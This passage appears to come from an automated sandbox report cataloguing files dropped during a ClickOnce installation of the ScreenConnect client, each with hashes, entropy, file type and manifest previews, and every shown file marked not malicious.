                                                                                                                                                                                                                                                        Preview:p...... ..........U.^'..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):308
                                                                                                                                                                                                                                                        Entropy (8bit):3.1990258837803287
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:kK0GPfzNcalgRAOAUSW0P3PeXJUwh8lmi3Y:sGPqtWOxSW0P3PeXJUZY
                                                                                                                                                                                                                                                        MD5:F6FC2089376612B277D3683203320E9E
                                                                                                                                                                                                                                                        SHA1:F1AC64EE6736613855E61082894D6418AE6D1452
                                                                                                                                                                                                                                                        SHA-256:C7E096C70CAC9D92F9BE2F32F8E95FDD5A2D74A9DB6DE07FD77706F30C4CA481
                                                                                                                                                                                                                                                        SHA-512:84A530AF1904EED9007EC5DD83D425C8F3F8BED626A3AB476E600DD2EC15E82F74BED20BC76CEE6178A27ECBC4506CAEFAD69C2E817E7E1E77E500864FB0E368
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:p...... ..........-.t'..(....................................................... ........}.-@@......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.G.4.C.o.d.e.S.i.g.n.i.n.g.R.S.A.4.0.9.6.S.H.A.3.8.4.2.0.2.1.C.A.1...c.r.t...".6.0.9.0.3.0.2.2.-.6.b.4."...
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):412
                                                                                                                                                                                                                                                        Entropy (8bit):3.9837744678058535
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:kKEbetlIls4qfOAUMivhClroFfJSUm2SQwItJqB3UgPSgakZdPolRMnOlAkrn:sRqmxMiv8sFBSfamB3rbFURMOlAkr
                                                                                                                                                                                                                                                        MD5:D10E078BDB08F77B37DAF16CD066B282
                                                                                                                                                                                                                                                        SHA1:7011112F25803FE0CD6B082FDE9055B8654A0988
                                                                                                                                                                                                                                                        SHA-256:73E4A42A0A8369F2EB69DDC5B4896891D940AA42B85AB0818EFB7D8000146FBB
                                                                                                                                                                                                                                                        SHA-512:8CF0CD5BDED59473575ABAB3D1A6354D5A1C2D9789B6C951F6AAA1A2188D79B55614D180EC23D1491140908B3D68C51E85DBFAD2E8C951F8F6EECDE65DBEC45C
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:p...... ....(...D.n.i'..(................].G{%....}p.*....................}p.*.. .........G..&.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.f.I.s.%.2.B.L.j.D.t.G.w.Q.0.9.X.E.B.1.Y.e.q.%.2.B.t.X.%.2.B.B.g.Q.Q.U.7.N.f.j.g.t.J.x.X.W.R.M.3.y.5.n.P.%.2.B.e.6.m.K.4.c.D.0.8.C.E.A.i.t.Q.L.J.g.0.p.x.M.n.1.7.N.q.b.2.T.r.t.k.%.3.D...
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):254
                                                                                                                                                                                                                                                        Entropy (8bit):3.049926868931216
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:kK+u/hLDcJgjcalgRAOAUSW0PTKDXMOXISKlUp:mu/hLYS4tWOxSW0PAMsZp
                                                                                                                                                                                                                                                        MD5:534C76AC04016DB09CA8FB9C0EB87C45
                                                                                                                                                                                                                                                        SHA1:10F9D6A9C99B9B57FC99A0CDB5E2BBD4DC9B10EE
                                                                                                                                                                                                                                                        SHA-256:FAB73D8A729EB3E0223AC7497AC1639384AAC115CBFC3FCCF30D955813C75659
                                                                                                                                                                                                                                                        SHA-512:CE35E789EA7455D7684CDAF9D3CFB759BD822B4062DC3B27AB78B48DE92D8365AFCC326A683DB039508D089B7221E4AEBA6AF61B8568E0845324C2107E12B968
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:p...... ....l....sV.N'..(....................................................... ............n......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.R.o.o.t.G.4...c.r.t...".5.a.2.8.6.4.1.7.-.5.9.4."...
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):25496
                                                                                                                                                                                                                                                        Entropy (8bit):5.428251555871276
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:/rqv5Gch6wX91yYFX9R/QPIBM7Yi1wUw+xC+l:/Wrh6wX9PX9R/QPI+0i1wd+l
                                                                                                                                                                                                                                                        MD5:C16F33F201063E11E26801F4214822CA
                                                                                                                                                                                                                                                        SHA1:05E4FA15D525426AA06B9DCB2A102A74D9958048
                                                                                                                                                                                                                                                        SHA-256:188EBE0620C46E399408F12FC6D2F6809EF01F366AAE146B9C60B1CB87297E63
                                                                                                                                                                                                                                                        SHA-512:D4306AFE91ADBF545C5EB978254B5633351243B338587793D4C1A3F5CE70CDD87CBC5D98030FDB7413E571D2B4A1889680D546F05B93977C1B5CF0AD08B5BD97
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10073), with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):17858
                                                                                                                                                                                                                                                        Entropy (8bit):5.954498332217529
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:heoXUrotw1aMWf6PX9hhyYF6X9FX9R/QPIYM7Y7:hV6PX9J6X9FX9R/QPIN07
                                                                                                                                                                                                                                                        MD5:9896F09BBC139E973FBA917FDA83C893
                                                                                                                                                                                                                                                        SHA1:56D9E63E078DAE56125B3B1F2E6A71A5F310E5DC
                                                                                                                                                                                                                                                        SHA-256:7831765826E44631D78ED36FA9D04F65B30E3A67FEFFB41E393FD73A063C7F61
                                                                                                                                                                                                                                                        SHA-512:024BAE2420FBA1790D946432336462F1A9F43388345393D9838EC913D109D198103182A853596B512A6C5E0F81096A1F76EA8A60908A456C320C32B8C5FA22CD
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="24.2.3.8936" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.2.3.8936" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" parameter
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):3452
                                                                                                                                                                                                                                                        Entropy (8bit):4.233644183250401
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:WsWWOeV+WwQXzmLoK8dF2G10PBFEphIYX:RJKkBzz1wETf
                                                                                                                                                                                                                                                        MD5:977F7CBC9E20DB8BD1A49B8BFC9E6424
                                                                                                                                                                                                                                                        SHA1:8BAE9FF39AAAEF73FB8D1C986EDC07C16A4A2332
                                                                                                                                                                                                                                                        SHA-256:EA52409AC30959D9568FC303D255BCDE3B15EC2C8426A8D37E4BF5466431C205
                                                                                                                                                                                                                                                        SHA-512:663908198C50AF199FE5D88011E8799365EB1137B5CDFC8DF2638F43495B135A6A744BD092539B451654FB22E480F45DC4A05FC6A0A2DBE28F441B88D0CEE3F8
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1215
                                                                                                                                                                                                                                                        Entropy (8bit):5.132426421892876
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:JdFYZ8h9onR+geP0AqvSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0AmGVETDTo
                                                                                                                                                                                                                                                        MD5:7836CB4BB4AA3204BE8BCB1998653762
                                                                                                                                                                                                                                                        SHA1:555EBD513BB5C4EE073415FD71F24D0697038F6D
                                                                                                                                                                                                                                                        SHA-256:F1E8F85E0495160BBA92E1B89C8C5A1BE51E5F7CC289212CBBAF6FC6141B4076
                                                                                                                                                                                                                                                        SHA-512:B18CC8779DCF15AB7DA2604F4D48E53870FE84E22B1CEE34AF9CC9D9B5B7A0CC5AABF11CC08CADD137A8CAA86451326A770B5FAC727E84E9721206649E4AE7A7
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssemb
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):5256
                                                                                                                                                                                                                                                        Entropy (8bit):3.9560495626717898
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:sw4+Rzg5heV+Ww7kkKJOlVolwKvfCQwnANbz:RRzg4JuKSyyDzAp
                                                                                                                                                                                                                                                        MD5:EA4764595A926883ED9EE011626FF7C1
                                                                                                                                                                                                                                                        SHA1:170F58999144BEC6D84EB2A6148BA65ED6A6C774
                                                                                                                                                                                                                                                        SHA-256:8FA57D0AE9DE1E6BBB5EBAC3EF3A92C30B67A82128E025E532D85BD3C5B10CF1
                                                                                                                                                                                                                                                        SHA-512:FFC0F18C8F7C9C43FEE56C686C2E657994418AD19C2937C674CEDEE72F4A1CABA48EE1C78C7950CA1B723E93F5218F17ADE07A093012751AE9B0FAFF8D267D67
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1980
                                                                                                                                                                                                                                                        Entropy (8bit):5.059741759134869
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:JdFYZ8h9onRbggeP0AIvSkcyMwcVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AEHMwGQAXRTFgTo
                                                                                                                                                                                                                                                        MD5:22FE4BC3BB143D14D2142E096955F9B7
                                                                                                                                                                                                                                                        SHA1:332597F5A4D2D3724DCFDA19AF7734846CEDF474
                                                                                                                                                                                                                                                        SHA-256:39D81BE76E978E5D6BF4DC5F74226E48FA4EA77780A6792CAB947C5D20D4A6AA
                                                                                                                                                                                                                                                        SHA-512:508660E83C75AD55A11CDDC6381547536A4CBB5A4A940D3D17F77AD256C9943360650750343FE32C86F6DC462273AEAE68E40903F2C33A0AD9F09D393FB1B59F
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.3.8936" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):6584
                                                                                                                                                                                                                                                        Entropy (8bit):3.947719410446542
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:Rh0PPBpRCeV+Www+8WpRyFoFFU9Q4BcwSUq+aFTVqO/t7:kPPPJypRyFH9Q4p5Ta1VR
                                                                                                                                                                                                                                                        MD5:AADC6A1A71086A2A3A1255842E163C23
                                                                                                                                                                                                                                                        SHA1:EA1E1035561EE7FBD30D3800DED632B870C5A3ED
                                                                                                                                                                                                                                                        SHA-256:8F78F2DFB7BDDFF068739F913086C89B066561A267607863D57DD516B759DB48
                                                                                                                                                                                                                                                        SHA-512:2AF38F3E7D9412E1858D1029C442D58F9A21C5FF73CA98CE75EF09A318A9090ECD703111BA5E4E1F1EADC37812E5148E8FA9B4E906724B2CB84E2DB6C8D12ED9
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):2569
                                                                                                                                                                                                                                                        Entropy (8bit):5.030098902772427
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:3FYZ8h9o5gI0AbHMwAXQ3MwTMwRGTDBTo:1YiW4AohvNo
                                                                                                                                                                                                                                                        MD5:F89D1C01400FCD12B5BB47E952ECBBCF
                                                                                                                                                                                                                                                        SHA1:D23F66FF01B2D06227208FFC88D0A923E99F565A
                                                                                                                                                                                                                                                        SHA-256:D540814FA7D487264D0167616D1EABDB78B4D4C0795B124452108CB14675DC26
                                                                                                                                                                                                                                                        SHA-512:A4513910019A2D7DB8A414D4A53CE7AC51FF30BD5631115F465F96119FD80D911EE4F9FFED4CB4C464F0235DA6CF3967DA583570E23B55F55B6E3DAAAF947773
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.3.8936" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):3032
                                                                                                                                                                                                                                                        Entropy (8bit):4.879316106971163
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:Ca6Q/cAgJOe6S+9oww7gk7Fw+f7iI++5dFkEM6VbjftBcnwbOA:CaV/cMeV+WwwFFwOiMRkbortBcnEOA
                                                                                                                                                                                                                                                        MD5:9E8D6EC04E6DAE62C8391BF0BE0FE3A2
                                                                                                                                                                                                                                                        SHA1:5917F15F6A52987E3EA0110B34C58255F5FEB70D
                                                                                                                                                                                                                                                        SHA-256:FCCA9752E5A1D860D76CDAEFF5336BE9A2014AAFE714A5EE29B817294983C11F
                                                                                                                                                                                                                                                        SHA-512:517C426E8A04ECC63158695C20F365DB8553B6C21B7E67213E55CF370C4910C1263AC831033D31FA05444579842FD0150EEF0030A3DFD31914A6824F2B70692F
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1039
                                                                                                                                                                                                                                                        Entropy (8bit):5.154101033983839
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:MMHdF4XZ8i9o9olxbv5NEgVkP0AJR7vNxW57FpS+iENg49vNxW5NgMCNg49vNxWO:JdFYZ8h9onRigeP0AKvSkcyMwcVSkTo
                                                                                                                                                                                                                                                        MD5:CD5FD6DC905D01654E81EAD73F6CE116
                                                                                                                                                                                                                                                        SHA1:9A3ED5183F323F33C37755B90B45D401D45AC46C
                                                                                                                                                                                                                                                        SHA-256:51F959457A28D492E123B6B2982865716E8A811CF43DE856033C24CE34C0B187
                                                                                                                                                                                                                                                        SHA-512:25CA0DBBC602C6B61ACA7DA840A2353FD8C5C7FB3B311544DDCC3B1936B3A0F72A93D32E38093AB8B30935211EB4D260EC766EA5C9FBD90D50740EACA54BC052
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.3.8936" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependent
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):14608
                                                                                                                                                                                                                                                        Entropy (8bit):5.715268356181181
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:I1DT9rI6wOvx58s8oEtYLN8s8oTN2x2QPIlFDLhEDh7BqWojO3:I139rI6wAX9LX9R/QPIBM7Yj0
                                                                                                                                                                                                                                                        MD5:7EFAF2FC46850F0860CBD305150EB7B2
                                                                                                                                                                                                                                                        SHA1:743FB1D5BBBBD7B69EECC715D997A16E2007B851
                                                                                                                                                                                                                                                        SHA-256:5A2054624576165111DA0E08BF0D2CA0E71491DDC622725DEAFB9FBB3454154A
                                                                                                                                                                                                                                                        SHA-512:237457304DAE4CB7203A43841DB9AC32B94674217F64BD43B89BA3F5AC4D0D40FBD3AF6715FA10B61068E93AD346DE302CD1561A3DD5B1E6B6B1F82262B781AF
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63849), with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):118229
                                                                                                                                                                                                                                                        Entropy (8bit):5.585370839513735
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3072:r7N8cT51/FXvMVNWfCXq9ymfm2o9HuzhJOvP:r6cfiVIBmt8vOvP
                                                                                                                                                                                                                                                        MD5:14CBFC8E1EE96D3503274F68DB7280B9
                                                                                                                                                                                                                                                        SHA1:964378CACB140A0771934E0D4B6EEEB18EE17B99
                                                                                                                                                                                                                                                        SHA-256:490F27B351F34197BEA76860091B7EBAB90F8427BD79C95889D2A12222C5CC00
                                                                                                                                                                                                                                                        SHA-512:410605A4400CA3A5C3F90E998755B5D76013E2314990A51F6F08150E8CC370FB8EC14F3F2B3D180B61322489D7F2672C0AB70F9EC7E4A6CE1566BBAE77A6AE2E
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.2.3.8936" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tru
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):4428
                                                                                                                                                                                                                                                        Entropy (8bit):4.0814070596009735
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:pojkeV+Ww8+45u6Or2WQkvFTOd4TyOmBf:OJ1u6lcUOyr
                                                                                                                                                                                                                                                        MD5:A7856DC379F49AAC188D6B5DECA56E9E
                                                                                                                                                                                                                                                        SHA1:377586E4340CEC5D436256FB68AE4706848C97C0
                                                                                                                                                                                                                                                        SHA-256:B27B29CEDDDC91BB57CBA0ACF33BF79727E5CEEDE15E5210F66BA0CF5FC82858
                                                                                                                                                                                                                                                        SHA-512:23CE34A589BF46800F5A770844FD4259A9B9A9C53C299831B382556F42B9E36657A871377E61A8AECCC02D9C2F4E4A849EFE54716294346C620B037E043C2163
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1632
                                                                                                                                                                                                                                                        Entropy (8bit):5.092740375848212
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:JdFYZ8h9onRzgeP0AW+vSkcyMwcbEMwcuMwcVSkcf5bdTo:3FYZ8h9o9gI0AWCHMwTMw3MwGAXTo
                                                                                                                                                                                                                                                        MD5:219DBCD947D7BBDF0BBC78778286B8C7
                                                                                                                                                                                                                                                        SHA1:E95D66F48C130644CE421CBBBFCF3D376FEBAC4E
                                                                                                                                                                                                                                                        SHA-256:C92BB401516771F702CD0986219589CA90E7DE089C8CF4DD825D904985299796
                                                                                                                                                                                                                                                        SHA-512:9E147F80D629AA00C4E0CB8DB708635BA6C14FDE30B8A5574927197352747B43B063060EB4D201C2B4AC984A9F4C84F5F774EB29DE481A0FEE572FB7B0C31F13
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.3.8936" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" version=
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):95520
                                                                                                                                                                                                                                                        Entropy (8bit):6.504144260093153
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:Sg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoU0HMu7axl:jhbNDxZGXfdHrX7rAc6myJkgoU0HVI
                                                                                                                                                                                                                                                        MD5:200A917996F0FC74879076354454473A
